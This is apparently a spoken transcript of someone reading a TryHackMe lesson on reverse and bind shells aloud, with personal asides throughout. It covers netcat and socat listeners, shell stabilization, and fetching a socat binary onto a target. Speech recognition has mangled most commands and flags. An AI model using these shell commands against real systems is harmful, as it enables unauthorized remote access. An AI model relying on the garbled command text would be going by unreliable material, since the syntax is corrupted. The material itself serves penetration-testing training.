Alright, let's get this going.
At a high level, we are interested in two kinds of shell when it comes to exploiting a target: reverse shells and bind shells.
Okay.
Reverse shells are when the target is forced to execute code that connects back to your computer. On your own computer, you would use one of the tools mentioned in the previous task to set up a listener which would be used to receive the connection. Reverse shells are a good way to bypass firewall rules that may prevent you from connecting to arbitrary ports on the target. However, the drawback is that, when receiving a shell from a machine across the internet, you would need to configure your own network to accept the shell. This, however, will not be a problem on the TryHackMe network due to the method by which we connect into the network. Bind shells are when the code executed on the target is used to start a listener attached to a shell directly on target. This would then be opened up to the internet, meaning you can connect to the port that the code has opened and obtain remote code execution that way. This has the advantage of not requiring any configuration on your own.
Hold on. Let's see. Form is little one.
This, however, will not be a problem on the TryHackMe network due to the method by which we connect into the network. Bind shells are when the code executed on the target is used to start a listener attached to a shell directly on target. This would then be opened up to the internet, meaning you can connect to the port that the code has opened and obtain remote code execution that way. This has the advantage of not requiring any configuration on your own network, but need be prevented by firewalls protecting the target. As a general rule, reverse shells are easier to execute and debug. However, we will cover both examples below. Don't worry too much about the syntax here. We will be looking at it in upcoming tasks. Instead, notice the difference between reverse and bind shells in the following simulations. Reverse shell example. Let's start with the more common reverse shell. 9 times out of 10, this is what you'll be going for, especially in CTF challenges like those of TryHackMe. Take a look at the following image. On the left we have a reverse shell listener. This is what receives the connection. On the right is a simulation of sending a reverse shell. In reality, this is more likely to be done through code injection on a remote website or something along those lines. Picture the image on the left as being your own computer, and the image on the right as being the target. On the attacking machine, sudo nclvnp 443 on the target, and local IP greater than port t/bin/bash.
I'm supposed to open up the attack logs.
Notice that after running the command on the right, the listener receives a connection. When the TryHackMe command is run, we see that we are executing commands as the target user. The important thing here is that we are listening on our own attacking machine and sending a connection from the target. Bind shell example. Bind shells are less common, but still very useful. Once again, take a look at the following image. Again, on the left we have the attacker's computer, on the right we have a simulated target. Just to shake things up a little, we'll use a Windows target this time. First, we start a listener on the target. This time we're also telling it to execute cmd.exe. Then, with the listener up and running, we connect from our own machine to the newly opened port, on target, and see lvnp port tcmd.exe on the attacking machine, and see machine_IP port.
I'm so tired. I can't even comprehend what's going on. Oh God.
As you can see, this once again gives us code execution on the remote machine. Note that this is not specific to Windows. The important thing to understand here is that we are listening on the target, then connecting to it with our own machine. The final concept which is relevant to this task is that of interactivity. Shells can be either interactive or non-interactive. Interactive, if you use PowerShell, Bash, ZSH, SH, or any other standard CLI environment, then you will be used to interactive shells. These allow you to interact with programs after executing them. For example, take the SSH login prompt.
Sorry, baby. That's right. This needs some loving, baby.
Here you can see that it's acting interactively, that the user type either yes or no in order to continue the connection. This is an interactive program, which requires an interactive shell in order to run. Non-interactive shells don't give you that luxury. In a non-interactive shell, you are limited to using programs which do not require user interaction in order to run properly. Unfortunately, the majority of simple reverse and bind shells are non-interactive, which can make further exploitation trickier. Let's see what happens when we try to run SSH in a non-interactive shell.
Yeah. Yeah, I remember having that problem. You just keep typing, but nothing happens.
Notice that the TryHackMe command, which is non-interactive, executes perfectly, but the SSH command, which is interactive, gives us no output at all. As an interesting side note, the output of an interactive command does go somewhere. However, figuring out where is an exercise for you to attempt on your own. Suffice to say that interactive programs do not work in non-interactive shells. Additionally, in various places throughout this task you will see a command in the screenshots called listener. This command is an alias unique to the attacking machine used for demonstrations, and is a shorthand way of typing sudo or app nclvnp 443, which will be covered in upcoming tasks. It will not work on any other machine unless the alias has been configured locally.
It's not Tiffus, it's she's just loving on. Has the victim machine listen on it.
As mentioned previously, Netcat is the most basic tool in a pen tester's toolkit when it comes to any kind of networking. With it we can do a wide variety of interesting things, but let's focus for now on shells. Reverse shells. In the previous task we saw that reverse shells require shellcode in a listener. There are many ways to execute a shell, so we will start by looking at listeners. The syntax for starting a Netcat listener using Linux is this. NCLV and keyboard number L is used to tell Netcat that this will be a listener. V is used to request a verbose output and tells Netcat not to resolve host names or use DNS. Explaining this is out with the scope of the room. P indicates that the port specification will follow. The example in the previous task used port 443. Realistically, you could use any port you like, as long as there isn't already a service using it. Be aware that if you choose to use a port below 1024, you will need to use sudo when starting your listener. That said, it's often a good idea to use a well-known port number, 80, 443 or 53 being good choices, as this is more likely to get past outbound firewall rules on the target. A working example of this would be sudo nclvnp 443. We can then connect back to this with any number of payloads, depending on the environment on the target. An example of this is displayed in the previous task. Bind shells. If we are looking to obtain a bind shell on a target, then we can assume that there is already a listener waiting for us on the chosen port of the target. All we need to do is connect to it. The syntax for this is relatively straightforward. NC target IP greater than chosen port. Here we are using Netcat to make an outbound connection to the target on our chosen port. We will look at using Netcat to create a listener for this type of shell in task 8. What's important here is that you understand how to connect to a listening port using Netcat.
Stop, Toothless. Ow, baby. You gotta calm down. Oh my god, there's no way this only takes 45 minutes.
Okay, so we're connected to a Netcat shell. What next? These shells are very unstable by default. Pressing Ctrl+C kills the whole thing. They are non-interactive and often have strange formatting errors. This is due to netcat shells really being processes running inside a terminal, rather than being bona fide terminals in their own right. Fortunately, there are many ways to stabilize netcat shells on Linux systems. We'll be looking at 3 here. Stabilization of Windows reverse shells tends to be significantly harder. However, the second technique that we'll be covering here is particularly useful for it. Technique 1. Python. The first technique we'll be discussing is applicable only to Linux boxes, as they will nearly always have Python installed by default. This is a 3-stage process. The first thing to do is use Python C import proprietary.spawn/bin/bash, which uses Python to spawn a better featured bash shell. Note that some targets may need the version of Python specified. If this is the case, replace Python with Python 2 or Python 3 as required. At this point our shell will look a bit prettier, but we still won't be able to use tab autocomplete or the arrow keys, and Ctrl+C will still kill the shell. Step 2 is export term equals term. This will give us access to term commands such as clear. Finally, and most importantly, we will background the shell using Ctrl+Z. Back in our own terminal we use the raw echo, FG. This does 2 things. First, it turns off our own terminal echo, which gives us access to tab autocompletes, the arrow keys, and Ctrl+C to kill processes. It then foregrounds the shell, thus completing the process. The full technique can be seen here. Note that if the shell dies, any input in your own terminal will not be visible, as a result of having disabled terminal echo. To fix this, type reset and press enter. Technique 2. Rollwrap. Rollwrap is a program which, in simple terms, gives us access to history, tab autocompletion and the arrow keys immediately upon receiving a shell. However, some manual stabilization must still be utilized if you want to be able to use Ctrl+C inside the shell. Rollwrap is not installed by default on Kali, so first install it with sudo apt install rollwrap. To use rollwrap, we invoke a slightly different listener, rollwrap nclvnp port prepending our netcat listener with rollwrap gives us a much more fully featured shell. This technique is particularly useful when dealing with Windows shells, which are otherwise notoriously difficult to stabilize. When dealing with a Linux target, it's possible to completely stabilize by using the same trick as in step 3 of the previous technique. Background the shell with Ctrl+Z, then use the raw echo, FG to stabilize and re-enter the shell. Technique 3. SOCAT. The third easy way to stabilize a shell is quite simply to use an initial netcat shell as a stepping stone into a more fully featured SOCAT shell. Bear in mind that this technique is limited to Linux targets, as the SOCAT shell on Windows will be no more stable than a netcat shell. To accomplish this method of stabilization, we would first transfer a SOCAT static compiled binary, a version of the program compiled to have no dependencies, up to the target machine. A typical way to achieve this would be using a web server on the attacking machine inside the directory containing your SOCAT binary, sudo python 3m http.server80, then, on the target machine, using the netcat shell to download the file. On Linux this would be accomplished with curl get local.
She's her little face is so cute. tired. Oh, fuck. Oh. Her little face.
For the sake of completeness, in a Windows CLI environment, the same can be done with PowerShell, using either Invoke Web Request or a Web Request System class, depending on the version of PowerShell installed. Invoke Web Request vary local IP greater than /socat.exe out file c : /windows /temp /socat.exe. We will cover the syntax for sending and receiving shells with SOCAT in the upcoming tasks. With any of the above techniques, it's useful to be able to change your terminal T size. This is something that your terminal will do automatically when using a regular shell. However, it must be done manually in a reverse or bind shell if you want to use something like a text editor which overwrites everything on the screen. First, open another terminal and run CA. This will give you a large stream of output. Note down the values for rows and columns. Next, in your reverse bind shell, type in C rows number and C cols number, filling in the numbers you got from running the command in your own terminal. This will change the registered width and height of the terminal, thus allowing programs such as text editors which rely on such information being accurate to correctly open.
It's right there.
SOCAT is similar to NetCat in some ways, but fundamentally different in many others. The easiest way to think about SOCAT is as a connector between 2 points. In the interests of this room, this will essentially be a listening port and a keyboard. However, it could also be a listening port and a file, or indeed, 2 listening ports. All SOCAT does is provide a link between 2 points, much like the portal gun from the Portal games. Once again, let's start with reverse shells. Reverse shells, as mentioned previously, the syntax for SOCAT gets a lot harder than that of NetCat. Here's the syntax for a basic reverse shell listener in SOCAT. SOCAT TCP out port. As always with SOCAT, this is taking 2 points, a listening port, and standard input, and connecting them together. The resulting shell is unstable, but this will work on either Linux or Windows and is equivalent to NCLVNP port. On Windows we would use this command to connect back. SOCAT TCP local IP greater than local port exec PowerShell.exe. Pipes. The pipes option is used to force PowerShell or CMD.exe to use Unix-style standard input and output. This is the equivalent command for a Linux target. SOCAT TCP local IP greater than local port exec --b bind shells on a Linux target. We would use the following command. SOCAT TCP L port exec --b on a Windows target. We would use this command for our listener. SOCAT TCP L port exec PowerShell.exe pipes. We use the pipes argument to interface between the Unix and Windows ways of handling input and output in the CLI environment. Regardless of the target, we use this command on our attacking machine to connect to the waiting listener. SOCAT TCP target IP greater than the target port. Now let's take a look at one of the more powerful uses for SOCAT, a fully stable Linux reverse shell. This will only work when the target is Linux, but is significantly more stable. As mentioned earlier, SOCAT is an incredibly versatile tool. However, the following technique is perhaps one of its most useful applications. Here is the new listener syntax. SOCAT TCPL port file T raw echo equals 0. Let's break this command down into its two parts. As usual, we're connecting 2 points together. In this case, those points are a listening port and a file. Specifically, we are passing in the current TYY as a file and setting the echo to be 0. This is approximately equivalent to using the Control plus Z to raw echo FG trick with a netcat shell, with the added bonus of being immediately stable and hooking into a full T. The first listener can be connected to with any payload. However, this special listener must be activated with a very specific SOCAT command. This means that the target must have SOCAT installed. Most machines do not have SOCAT installed by default. However, it's possible to upload a precompiled SOCAT binary, which can then be executed as normal. The special command is as follows. SOCAT TCP attacker IP greater than attacker port exec.
This is too much information.
Proprietary. Stubber. Sergeant says it, saying this is a handful. So let's break it down. The first part is easy. We're linking up with the listener running on our own machine. The second part of the command creates an interactive bash session with exec, bash lead. We are also passing the arguments. Proprietary, stubber, sergeant, sets it and saying. Proprietary, allocates a pseudo-terminal on the target. Part of the stabilization process, stubber, makes sure that any error messages get shown in a shell. Often a problem with non-interactive shell. Sergeant passes any Control plus C commands through into the sub-process, allowing us to kill commands inside the shell says it. Creates the process in a new session saying, stabilizes the terminal, attempting to normalize it. That's a lot to take in, so let's see it in action. As normal, on the left we have a listener running on our local attacking machine. On the right we have a simulation of a compromised target, running with a non-interactive shell. Using the non-interactive netcat shell, we execute the special SOCAT command, and receive a fully interactive bash shell on the SOCAT listener to the left.
Huh? Will it not be SOCAT 8080? I'm too tired. Oh, guys, I'm tired. Absolutely tired. So, I'm gonna go to bed. Just wore out. It's only 9 o'clock, but I'm wore out, man.